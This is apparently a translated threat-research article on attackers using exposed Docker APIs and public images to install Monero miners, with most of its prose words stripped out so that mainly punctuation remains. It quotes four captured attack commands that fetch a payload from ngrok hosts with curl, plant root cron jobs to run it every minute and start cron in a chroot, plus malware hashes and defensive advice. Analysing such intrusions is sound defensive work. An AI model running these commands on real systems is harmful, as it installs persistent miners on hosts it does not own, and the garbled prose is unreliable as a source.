💊 🔆 🛡️ How open-source Docker API and public images from the community are used to distribute cryptocurrency miners 👀 👩‍👧‍👧 🚣🏼

, -honeypots — . , Docker Hub. , - .

honeypots, , , , - . , Docker , . honeypots , , , .

, , Docker. , — , .

Docker API , , , , ( ) .

— . — , .

3762 Docker API. Shodan 12.02.2019

honeypots. Shodan , Docker API (. ) , , Monero. (2018, . ) 856 API.

honeypots , ngrok, ( localhost). URL` . , ngrok:

Tty: false
Command: “-c curl –retry 3 -m 60 -o /tmp9bedce/tmp/tmpfilece427fe0eb0426d997cb0455f9fbd283d \”hxxp://12f414f1[.]ngrok[.]io/f/serve?l=d&r=ce427fe0eb0426d997cb0455f9fbd283\”;echo \”* * * * * root sh /tmp/tmpfilece427fe0eb0426d997cb0455f9fbd283d\” >/tmp9bedce/etc/crontab;echo \”* * * * * root sh /tmp/tmpfilece427fe0eb0426d997cb0455f9fbd283d\” >/tmp9bedce/etc/cron.d/1m;chroot /tmp9bedce sh -c \”cron || crond\””,
Entrypoint: “/bin/sh”

Tty: false,
Command: “-c curl –retry 3 -m 60 -o /tmp570547/tmp/tmpfilece427fe0eb0426d997cb0455f9fbd283d \”hxxp://5249d5f6[.]ngrok[.]io/f/serve?l=d&r=ce427fe0eb0426d997cb0455f9fbd283\”;echo \”* * * * * root sh /tmp/tmpfilece427fe0eb0426d997cb0455f9fbd283d\” >/tmp570547/etc/crontab;echo \”* * * * * root sh /tmp/tmpfilece427fe0eb0426d997cb0455f9fbd283d\” >/tmp570547/etc/cron.d/1m;chroot /tmp570547 sh -c \”cron || crond\””,
Entrypoint: “/bin/sh”

Tty: false,
Command: “-c curl –retry 3 -m 60 -o /tmp326c80/tmp/tmpfilece427fe0eb0426d9aa8e1b9ec086e4eed \”hxxp://b27562c1[.]ngrok[.]io/f/serve?l=d&r=ce427fe0eb0426d9aa8e1b9ec086e4ee\”;echo \”* * * * * root sh /tmp/tmpfilece427fe0eb0426d9aa8e1b9ec086e4eed\” >/tmp326c80/etc/crontab;echo \”* * * * * root sh /tmp/tmpfilece427fe0eb0426d9aa8e1b9ec086e4eed\” >/tmp326c80/etc/cron.d/1m;chroot /tmp326c80 sh -c \”cron || crond\””,
Entrypoint: “/bin/sh”,

Tty: false,
Cmd: “-c curl –retry 3 -m 60 -o /tmp8b9b5b/tmp/tmpfilece427fe0eb0426d9aa8e1b9ec086e4eed \”hxxp://f30c8cf9[.]ngrok[.]io/f/serve?l=d&r=ce427fe0eb0426d9aa8e1b9ec086e4ee\”;echo \”* * * * * root sh /tmp/tmpfilece427fe0eb0426d9aa8e1b9ec086e4eed\” >/tmp8b9b5b/etc/crontab;echo \”* * * * * root sh /tmp/tmpfilece427fe0eb0426d9aa8e1b9ec086e4eed\” >/tmp8b9b5b/etc/cron.d/1m;chroot /tmp8b9b5b sh -c \”cron || crond\””,
Entrypoint: “/bin/sh”

, URL. URL , .

. — ELF Linux ( Coinminer.SH.MALXMR.ATNO), . — (TrojanSpy.SH.ZNETMAP.A), , .

- , . HOST URL, , RIP — ( ) . HOST . , .

HOST RIP, , ,

, nginx. , Linux. .

. URL . zmap, . , ( ).

, . — Docker — .

— . , , : Redis, Jenkins, Drupal, MODX, Kubernetes Master, Docker 1.16 Apache CouchDB. — , . . URL, .

Docker, .

— , — zmap

— , — , Docker

, alpine-curl 10

Alpine Linux curl, CLI , Docker. , 10 . , , . Docker — , . ( ), . , .

, (alpine-curl) , — . Docker . Docker .

, DevOps, . - , , , . , , , .

, , , :

: API, .
: , , ( ) .
, Docker .
, (, ). , .

Trendmicro DevOps , . Trend Micro Hybrid Cloud Security , DevOps XGen , . Deep Security Deep Security Smart Check, Docker .

54343fd1555e1f72c2c1d30369013fb40372a88875930c71b8c3a23bbe5bb15e (Coinminer.SH.MALXMR.ATNO)
f1e53879e992771db6045b94b3f73d11396fbe7b3394103718435982a7161228 (TrojanSpy.SH.ZNETMAP.A)

Docker - , , . 19-21 - DevOps Tools&Cheats - , .

How open-source Docker API and public images from the community are used to distribute cryptocurrency miners

More articles: